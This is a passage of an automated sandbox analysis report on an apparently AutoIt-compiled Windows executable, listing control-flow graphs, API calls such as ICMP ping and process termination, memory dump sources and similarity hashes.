                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                            • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                            • Opcode ID: b0bb8508bce07d0952e739ebbefe7882a24c28a82e58d0baf3b27499c2102358
                                                                                                                                                                                                                                                                            • Instruction ID: e79425a17f0eafff4ca8a69c43d01c1c1fc6c105375e2885849e2b4674e2613e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0bb8508bce07d0952e739ebbefe7882a24c28a82e58d0baf3b27499c2102358
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D719D715143859BC704EF65EC81EAEBBE8FF98340F90846EF541831B0DB719A49CB92

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00BF34DE
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00BF34ED
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00BF3503
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A4), ref: 00BF3515
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A2), ref: 00BF3527
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BF353F
                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(?), ref: 00BF3590
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: GetSysColorBrush.USER32(0000000F), ref: 00BF3657
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: RegisterClassExW.USER32(00000030), ref: 00BF3681
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF3692
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: InitCommonControlsEx.COMCTL32(?), ref: 00BF36AF
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF36BF
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: LoadIconW.USER32(000000A9), ref: 00BF36D5
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF36E4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                            • Opcode ID: 9707e0273a55b78eb558b3d474e03746547dd81b1b2618f59c9d940793713ad4
                                                                                                                                                                                                                                                                            • Instruction ID: 92b779213bcaeacc926a5fa9ff313e487c47672f37c86accbae2d8fb450c3021
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9707e0273a55b78eb558b3d474e03746547dd81b1b2618f59c9d940793713ad4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E213D70D00398ABDB109FA5EC55FAD7FF8FB08B50F08002AEA05A72B0D7B945448F94

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 510 c70fb8-c70fef call bfe6a0 513 c70ff1-c70ffe call bfc98d 510->513 514 c7100f-c71021 WSAStartup 510->514 513->514 525 c71000-c7100b call bfc98d 513->525 516 c71054-c71091 call c0c1f6 call bf8ec0 call c0f9d4 inet_addr gethostbyname 514->516 517 c71023-c71031 514->517 533 c71093-c710a0 IcmpCreateFile 516->533 534 c710a2-c710b0 516->534 518 c71036-c71046 517->518 519 c71033 517->519 522 c7104b-c7104f 518->522 523 c71048 518->523 519->518 526 c71249-c71251 522->526 523->522 525->514 533->534 535 c710d3-c71100 call c1017b call bf423c 533->535 536 c710b5-c710c5 534->536 537 c710b2 534->537 546 c71102-c71129 IcmpSendEcho 535->546 547 c7112b-c71148 IcmpSendEcho 535->547 539 c710c7 536->539 540 c710ca-c710ce 536->540 537->536 539->540 541 c71240-c71244 call bfbd98 540->541 541->526 548 c7114c-c7114e 546->548 547->548 549 c71150-c71155 548->549 550 c711ae-c711bc 548->550 553 c7115b-c71160 549->553 554 c711f8-c7120a call bfe6a0 549->554 551 c711c1-c711c8 550->551 552 c711be 550->552 555 c711e4-c711ed 551->555 552->551 556 c71162-c71167 553->556 557 c711ca-c711d8 553->557 565 c71210 554->565 566 c7120c-c7120e 554->566 561 c711f2-c711f6 555->561 562 c711ef 555->562 556->550 563 c71169-c7116e 556->563 559 c711dd 557->559 560 c711da 557->560 559->555 560->559 567 c71212-c71229 IcmpCloseHandle WSACleanup 561->567 562->561 568 c71193-c711a1 563->568 569 c71170-c71175 563->569 565->567 566->567 567->541 572 c7122b-c7123d call c1013d call c10184 567->572 570 c711a6-c711ac 568->570 571 c711a3 568->571 569->557 573 c71177-c71185 569->573 570->555 571->570 572->541 575 c71187 573->575 576 c7118a-c71191 573->576 575->576 576->555
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 00C71019
                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?), ref: 00C71079
                                                                                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 00C71085
                                                                                                                                                                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00C71093
                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C71123
                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C71142
                                                                                                                                                                                                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00C71216
                                                                                                                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 00C7121C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                            • String ID: Ping
                                                                                                                                                                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                            • Opcode ID: ce5da003fbb43925e8752a3a4082725aec37fd815c0b93ec238bc8837a6d732f
                                                                                                                                                                                                                                                                            • Instruction ID: 18d8978b9a270c33fe6b1821e9af58e17c5e0d1fe455c7287fb3e655816cf919
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce5da003fbb43925e8752a3a4082725aec37fd815c0b93ec238bc8837a6d732f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 469183716042419FD720DF19C889F2ABBE4BF44318F18C5A9F9699F6A2C731ED85CB81

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 580 bf370f-bf3724 581 bf3726-bf3729 580->581 582 bf3784-bf3786 580->582 583 bf372b-bf3732 581->583 584 bf378a 581->584 582->581 585 bf3788 582->585 586 bf3738-bf373d 583->586 587 bf3804-bf380c PostQuitMessage 583->587 589 c33df4-c33e1c call bf2f92 call c0f23c 584->589 590 bf3790-bf3795 584->590 588 bf376f-bf3777 DefWindowProcW 585->588 591 c33e61-c33e75 call c5c8f7 586->591 592 bf3743-bf3747 586->592 595 bf37b8-bf37ba 587->595 594 bf377d-bf3783 588->594 626 c33e21-c33e28 589->626 596 bf37bc-bf37e3 SetTimer RegisterWindowMessageW 590->596 597 bf3797-bf379a 590->597 591->595 619 c33e7b 591->619 600 bf380e-bf3818 call c0fcad 592->600 601 bf374d-bf3752 592->601 595->594 596->595 602 bf37e5-bf37f0 CreatePopupMenu 596->602 598 c33d95-c33d98 597->598 599 bf37a0-bf37b3 KillTimer call bf3907 call bf59ff 597->599 611 c33dd0-c33def MoveWindow 598->611 612 c33d9a-c33d9e 598->612 599->595 621 bf381d 600->621 606 c33e46-c33e4d 601->606 607 bf3758-bf375d 601->607 602->595 606->588 616 c33e53-c33e5c call c51423 606->616 617 bf3763-bf3769 607->617 618 bf37f2-bf3802 call bf381f 607->618 611->595 613 c33da0-c33da3 612->613 614 c33dbf-c33dcb SetFocus 612->614 613->617 622 c33da9-c33dba call bf2f92 613->622 614->595 616->588 617->588 617->626 618->595 619->588 621->595 622->595 626->588 630 c33e2e-c33e41 call bf3907 call bf396b 626->630 630->588
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BF3709,?,?), ref: 00BF3777
                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00BF3709,?,?), ref: 00BF37A3
                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BF37C6
                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BF3709,?,?), ref: 00BF37D1
                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00BF37E5
                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00BF3806
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                            • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                            • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                            • Opcode ID: a839c349e34edd057c12e7a0d93d097824b23311686c54d1b1116994db8ce014
                                                                                                                                                                                                                                                                            • Instruction ID: 4585b5a80723548a2173ef9fb94005cb3c16620ba97ed9bac6252fdd938323dc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a839c349e34edd057c12e7a0d93d097824b23311686c54d1b1116994db8ce014
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A41B1F121428CBADB143B68DC89F7D3AE9E704B10F044169FB02871A4CAB89F889765

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 636 c290c5-c290d5 637 c290d7-c290ea call c1f636 call c1f649 636->637 638 c290ef-c290f1 636->638 652 c29471 637->652 639 c290f7-c290fd 638->639 640 c29459-c29466 call c1f636 call c1f649 638->640 639->640 643 c29103-c2912e 639->643 657 c2946c call c22b5c 640->657 643->640 647 c29134-c2913d 643->647 650 c29157-c29159 647->650 651 c2913f-c29152 call c1f636 call c1f649 647->651 655 c29455-c29457 650->655 656 c2915f-c29163 650->656 651->657 658 c29474-c29479 652->658 655->658 656->655 660 c29169-c2916d 656->660 657->652 660->651 663 c2916f-c29186 660->663 665 c291a3-c291ac 663->665 666 c29188-c2918b 663->666 669 c291ca-c291d4 665->669 670 c291ae-c291c5 call c1f636 call c1f649 call c22b5c 665->670 667 c29195-c2919e 666->667 668 c2918d-c29193 666->668 671 c2923f-c29259 667->671 668->667 668->670 673 c291d6-c291d8 669->673 674 c291db-c291dc call c23b93 669->674 701 c2938c 670->701 676 c2925f-c2926f 671->676 677 c2932d-c29336 call c2fc1b 671->677 673->674 682 c291e1-c291f9 call c22d38 * 2 674->682 676->677 681 c29275-c29277 676->681 689 c29338-c2934a 677->689 690 c293a9 677->690 681->677 685 c2927d-c292a3 681->685 705 c29216-c2923c call c297a4 682->705 706 c291fb-c29211 call c1f649 call c1f636 682->706 685->677 691 c292a9-c292bc 685->691 689->690 696 c2934c-c2935b GetConsoleMode 689->696 694 c293ad-c293c5 ReadFile 690->694 691->677 692 c292be-c292c0 691->692 692->677 697 c292c2-c292ed 692->697 699 c29421-c2942c GetLastError 694->699 700 c293c7-c293cd 694->700 696->690 702 c2935d-c29361 696->702 697->677 704 c292ef-c29302 697->704 707 c29445-c29448 699->707 708 c2942e-c29440 call c1f649 call c1f636 699->708 700->699 709 c293cf 700->709 703 c2938f-c29399 call c22d38 701->703 702->694 710 c29363-c2937d ReadConsoleW 702->710 703->658 704->677 712 c29304-c29306 704->712 705->671 706->701 719 c29385-c2938b call c1f613 707->719 720 c2944e-c29450 707->720 708->701 716 c293d2-c293e4 709->716 717 c2939e-c293a7 710->717 718 c2937f GetLastError 710->718 712->677 722 c29308-c29328 712->722 716->703 726 c293e6-c293ea 716->726 717->716 718->719 719->701 720->703 722->677 730 c29403-c2940e 726->730 731 c293ec-c293fc call c28de1 726->731 733 c29410 call c28f31 730->733 734 c2941a-c2941f call c28c21 730->734 743 c293ff-c29401 731->743 741 c29415-c29418 733->741 734->741 741->743 743->703
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 12721e6fcc9728aad527510f19d78deab06c9e6524428431cc6f28c7b8b772d2
                                                                                                                                                                                                                                                                            • Instruction ID: b19bf86713799e4f308b24a5429c93d814d68517a161467c3cf58e90cbae7df6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12721e6fcc9728aad527510f19d78deab06c9e6524428431cc6f28c7b8b772d2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7C1E570D04259AFDF11DFE9E841BADBBB0EF0A310F084059E965A77A2C7309E42DB61

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 744 c0ac3e-c0b063 call bf8ec0 call c0bc58 call bfe6a0 751 c48584-c48591 744->751 752 c0b069-c0b073 744->752 753 c48596-c485a5 751->753 754 c48593 751->754 755 c0b079-c0b07e 752->755 756 c4896b-c48979 752->756 757 c485a7 753->757 758 c485aa 753->758 754->753 761 c0b084-c0b090 call c0b5b6 755->761 762 c485b2-c485b4 755->762 759 c4897e 756->759 760 c4897b 756->760 757->758 758->762 764 c48985-c4898e 759->764 760->759 768 c485bd 761->768 769 c0b096-c0b0a3 call bfc98d 761->769 762->768 766 c48990 764->766 767 c48993 764->767 766->767 772 c4899c-c489eb call bfe6a0 call c0bbbe * 2 767->772 771 c485c7 768->771 776 c0b0ab-c0b0b4 769->776 777 c485cf-c485d2 771->777 806 c0b1e0-c0b1f5 772->806 807 c489f1-c48a03 call c0b5b6 772->807 781 c0b0b8-c0b0d6 call c14d98 776->781 778 c0b158-c0b16f 777->778 779 c485d8-c48600 call c14cd3 call bf7ad5 777->779 784 c48954-c48957 778->784 785 c0b175 778->785 818 c48602-c48606 779->818 819 c4862d-c48651 call bf7b1a call bfbd98 779->819 800 c0b0e5 781->800 801 c0b0d8-c0b0e1 781->801 789 c48a41-c48a79 call bfe6a0 call c0bbbe 784->789 790 c4895d-c48960 784->790 791 c488ff-c48920 call bfe6a0 785->791 792 c0b17b-c0b17e 785->792 789->806 849 c48a7f-c48a91 call c0b5b6 789->849 790->772 797 c48962-c48965 790->797 791->806 823 c48926-c48938 call c0b5b6 791->823 798 c0b184-c0b187 792->798 799 c48729-c48743 call c0bbbe 792->799 797->756 797->806 808 c0b18d-c0b190 798->808 809 c486ca-c486e0 call bf6c03 798->809 827 c4888f-c488b5 call bfe6a0 799->827 828 c48749-c4874c 799->828 800->771 812 c0b0eb-c0b0fc 800->812 801->781 810 c0b0e3 801->810 813 c0b1fb-c0b20b call bfe6a0 806->813 814 c48ac9-c48acf 806->814 840 c48a05-c48a0d 807->840 841 c48a2f-c48a3c call bfc98d 807->841 821 c48656-c48659 808->821 822 c0b196-c0b1b8 call bfe6a0 808->822 809->806 838 c486e6-c486fc call c0b5b6 809->838 810->812 812->756 824 c0b102-c0b11c 812->824 814->776 830 c48ad5 814->830 818->819 832 c48608-c4862b call bfad40 818->832 819->821 821->756 825 c4865f-c48674 call bf6c03 821->825 822->806 858 c0b1ba-c0b1cc call c0b5b6 822->858 861 c48945 823->861 862 c4893a-c48943 call bfc98d 823->862 824->777 837 c0b122-c0b154 call c0bbbe call bfe6a0 824->837 825->806 880 c4867a-c48690 call c0b5b6 825->880 827->806 883 c488bb-c488cd call c0b5b6 827->883 847 c4874e-c48751 828->847 848 c487bf-c487de call bfe6a0 828->848 830->756 832->818 832->819 837->778 886 c4870d-c48716 call bf8ec0 838->886 887 c486fe-c4870b call bf8ec0 838->887 856 c48a1e-c48a29 call bfb4b1 840->856 857 c48a0f-c48a13 840->857 893 c48ac2-c48ac4 841->893 864 c48757-c48774 call bfe6a0 847->864 865 c48ada-c48ae8 847->865 848->806 885 c487e4-c487f6 call c0b5b6 848->885 897 c48ab5-c48abe call bfc98d 849->897 898 c48a93-c48a9b 849->898 856->841 904 c48b0b-c48b19 856->904 857->856 873 c48a15-c48a19 857->873 905 c0b1d2-c0b1de 858->905 906 c486ba-c486c3 call bfc98d 858->906 879 c48949-c4894f 861->879 862->879 864->806 908 c4877a-c4878c call c0b5b6 864->908 871 c48aed-c48afd 865->871 872 c48aea 865->872 888 c48b02-c48b06 871->888 889 c48aff 871->889 872->871 890 c48aa1-c48aa3 873->890 879->806 918 c48692-c4869b call bfc98d 880->918 919 c4869d-c486ab call bf8ec0 880->919 923 c488de 883->923 924 c488cf-c488dc call bfc98d 883->924 885->806 926 c487fc-c48805 call c0b5b6 885->926 927 c48719-c48724 call bf8577 886->927 887->927 888->813 889->888 890->806 893->806 897->893 909 c48a9d 898->909 910 c48aa8-c48ab3 call bfb4b1 898->910 915 c48b1e-c48b21 904->915 916 c48b1b 904->916 905->806 906->809 941 c4878e-c4879d call bfc98d 908->941 942 c4879f 908->942 909->890 910->897 910->904 915->764 916->915 947 c486ae-c486b5 918->947 919->947 925 c488e2-c488e9 923->925 924->925 935 c488f5 call bf3907 925->935 936 c488eb-c488f0 call bf396b 925->936 953 c48807-c48816 call bfc98d 926->953 954 c48818 926->954 927->806 952 c488fa 935->952 936->806 949 c487a3-c487ae call c19334 941->949 942->949 947->806 949->756 959 c487b4-c487ba 949->959 952->806 958 c4881c-c4883f 953->958 954->958 961 c48841-c48848 958->961 962 c4884d-c48850 958->962 959->806 961->962 963 c48860-c48863 962->963 964 c48852-c4885b 962->964 965 c48865-c4886e 963->965 966 c48873-c48876 963->966 964->963 965->966 966->806 967 c4887c-c4888a 966->967 967->806
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                            • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                            • Opcode ID: 5eff6b7c6fed7325d107f6426d341cdc1f43954b6766732ba9c7dd58ce8a1af2
                                                                                                                                                                                                                                                                            • Instruction ID: 7accb634d2c3fdff09dbad0719e72c4b32155f7a7fe5e0bf33825c16ca979a86
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eff6b7c6fed7325d107f6426d341cdc1f43954b6766732ba9c7dd58ce8a1af2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 066248B05083459FC728DF15C494AAEBBE1FF89308F10895EE5998B391DB71DA49CF82

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 968 c7ab3f-c7ab6e call bf8ec0 call c5dd87 972 c7ab73-c7ab76 968->972 973 c7abb9-c7abbd 972->973 974 c7ab78-c7ab98 call bfe6a0 972->974 975 c7abc3-c7abd7 OpenProcess 973->975 976 c7ad29-c7ad3a call bfe6a0 973->976 987 c7ab9d-c7abac 974->987 988 c7ab9a 974->988 978 c7acc2-c7accd TerminateProcess 975->978 979 c7abdd-c7abe6 GetLastError 975->979 992 c7ad3c-c7ad44 976->992 982 c7ad20-c7ad27 CloseHandle 978->982 983 c7accf-c7acf1 GetLastError call bf7b71 978->983 984 c7ac72-c7ac8f call bf7b71 979->984 985 c7abec-c7ac06 call c5d715 call c52010 979->985 982->992 998 c7acf6-c7ad06 983->998 999 c7acf3 983->999 1001 c7ac94-c7aca4 984->1001 1002 c7ac91 984->1002 1009 c7ac1a-c7ac38 call bf7b71 985->1009 1010 c7ac08-c7ac18 OpenProcess 985->1010 993 c7abb1-c7abb4 987->993 994 c7abae 987->994 988->987 993->992 994->993 1003 c7ad0b-c7ad19 call bfe6a0 998->1003 1004 c7ad08 998->1004 999->998 1006 c7aca6 1001->1006 1007 c7aca9-c7acb7 call bfe6a0 1001->1007 1002->1001 1003->982 1004->1003 1006->1007 1018 c7acbe-c7acc0 1007->1018 1020 c7ac3d-c7ac4d 1009->1020 1021 c7ac3a 1009->1021 1013 c7ac67-c7ac70 call c51a0b 1010->1013 1013->1018 1018->978 1018->992 1022 c7ac52-c7ac60 call bfe6a0 1020->1022 1023 c7ac4f 1020->1023 1021->1020 1022->1013 1023->1022
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00C5DDAC
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00C5DDBA
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DD87: CloseHandle.KERNEL32(00000000), ref: 00C5DE87
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7ABCA
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C7ABDD
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7AC10
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C7ACC5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00C7ACD0
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7AD21
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
